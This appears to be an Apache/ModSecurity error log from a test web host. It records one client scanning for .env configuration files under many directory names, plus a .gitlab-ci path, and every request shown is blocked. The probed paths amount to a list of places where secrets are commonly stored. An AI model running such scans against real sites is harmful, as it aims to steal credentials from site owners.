[Sat Mar 21 04:10:51.003305 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.production"] [unique_id "ab4MOycEfGZAHyIZnYBwPQAAAAQ"]
[Sat Mar 21 04:10:51.003446 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env.production"] [unique_id "ab4MOycEfGZAHyIZnYBwPQAAAAQ"]
[Sat Mar 21 04:10:51.299551 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.staging"] [unique_id "ab4MOycEfGZAHyIZnYBwPgAAAAQ"]
[Sat Mar 21 04:10:51.299720 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.staging"] [unique_id "ab4MOycEfGZAHyIZnYBwPgAAAAQ"]
[Sat Mar 21 04:10:51.299873 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.staging"] [unique_id "ab4MOycEfGZAHyIZnYBwPgAAAAQ"]
[Sat Mar 21 04:10:51.629285 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.staging"] [unique_id "ab4MOycEfGZAHyIZnYBwPwAAAAQ"]
[Sat Mar 21 04:10:51.629455 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.staging"] [unique_id "ab4MOycEfGZAHyIZnYBwPwAAAAQ"]
[Sat Mar 21 04:10:51.629601 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.staging"] [unique_id "ab4MOycEfGZAHyIZnYBwPwAAAAQ"]
[Sat Mar 21 04:10:51.924564 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.production"] [unique_id "ab4MOycEfGZAHyIZnYBwQAAAAAQ"]
[Sat Mar 21 04:10:51.924721 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.production"] [unique_id "ab4MOycEfGZAHyIZnYBwQAAAAAQ"]
[Sat Mar 21 04:10:51.924872 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.production"] [unique_id "ab4MOycEfGZAHyIZnYBwQAAAAAQ"]
[Sat Mar 21 04:10:52.247067 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.production"] [unique_id "ab4MPCcEfGZAHyIZnYBwQQAAAAQ"]
[Sat Mar 21 04:10:52.247225 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.production"] [unique_id "ab4MPCcEfGZAHyIZnYBwQQAAAAQ"]
[Sat Mar 21 04:10:52.247385 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.production"] [unique_id "ab4MPCcEfGZAHyIZnYBwQQAAAAQ"]
[Sat Mar 21 04:10:52.541775 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.production"] [unique_id "ab4MPCcEfGZAHyIZnYBwQgAAAAQ"]
[Sat Mar 21 04:10:52.541935 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.production"] [unique_id "ab4MPCcEfGZAHyIZnYBwQgAAAAQ"]
[Sat Mar 21 04:10:52.542099 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.production"] [unique_id "ab4MPCcEfGZAHyIZnYBwQgAAAAQ"]
[Sat Mar 21 04:10:52.868299 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env"] [unique_id "ab4MPCcEfGZAHyIZnYBwQwAAAAQ"]
[Sat Mar 21 04:10:52.868479 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env"] [unique_id "ab4MPCcEfGZAHyIZnYBwQwAAAAQ"]
[Sat Mar 21 04:10:52.868635 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env"] [unique_id "ab4MPCcEfGZAHyIZnYBwQwAAAAQ"]
[Sat Mar 21 04:10:53.163006 2026] [authz_core:error] [pid 2836927] [client 13.54.173.38:57880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci
[Sat Mar 21 04:10:53.479732 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env"] [unique_id "ab4MPScEfGZAHyIZnYBwRQAAAAQ"]
[Sat Mar 21 04:10:53.479950 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env"] [unique_id "ab4MPScEfGZAHyIZnYBwRQAAAAQ"]
[Sat Mar 21 04:10:53.480127 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env"] [unique_id "ab4MPScEfGZAHyIZnYBwRQAAAAQ"]
[Sat Mar 21 04:10:53.804876 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.production"] [unique_id "ab4MPScEfGZAHyIZnYBwRgAAAAQ"]
[Sat Mar 21 04:10:53.805123 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.production"] [unique_id "ab4MPScEfGZAHyIZnYBwRgAAAAQ"]
[Sat Mar 21 04:10:53.805326 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.production"] [unique_id "ab4MPScEfGZAHyIZnYBwRgAAAAQ"]
[Sat Mar 21 04:10:54.100888 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.local"] [unique_id "ab4MPicEfGZAHyIZnYBwRwAAAAQ"]
[Sat Mar 21 04:10:54.101051 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.local"] [unique_id "ab4MPicEfGZAHyIZnYBwRwAAAAQ"]
[Sat Mar 21 04:10:54.101213 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.local"] [unique_id "ab4MPicEfGZAHyIZnYBwRwAAAAQ"]
[Sat Mar 21 04:10:54.485943 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "ab4MPicEfGZAHyIZnYBwSAAAAAQ"]
[Sat Mar 21 04:10:54.486108 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "ab4MPicEfGZAHyIZnYBwSAAAAAQ"]
[Sat Mar 21 04:10:54.486266 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "ab4MPicEfGZAHyIZnYBwSAAAAAQ"]
[Sat Mar 21 04:10:54.829712 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.production"] [unique_id "ab4MPicEfGZAHyIZnYBwSQAAAAQ"]
[Sat Mar 21 04:10:54.829884 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.production"] [unique_id "ab4MPicEfGZAHyIZnYBwSQAAAAQ"]
[Sat Mar 21 04:10:54.830027 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.production"] [unique_id "ab4MPicEfGZAHyIZnYBwSQAAAAQ"]
[Sat Mar 21 04:10:57.128274 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env"] [unique_id "ab4MQScEfGZAHyIZnYBwSgAAAAQ"]
[Sat Mar 21 04:10:57.130688 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env"] [unique_id "ab4MQScEfGZAHyIZnYBwSgAAAAQ"]
[Sat Mar 21 04:10:57.131000 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env"] [unique_id "ab4MQScEfGZAHyIZnYBwSgAAAAQ"]
[Sat Mar 21 04:10:57.426209 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.staging"] [unique_id "ab4MQScEfGZAHyIZnYBwSwAAAAQ"]
[Sat Mar 21 04:10:57.426387 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.staging"] [unique_id "ab4MQScEfGZAHyIZnYBwSwAAAAQ"]
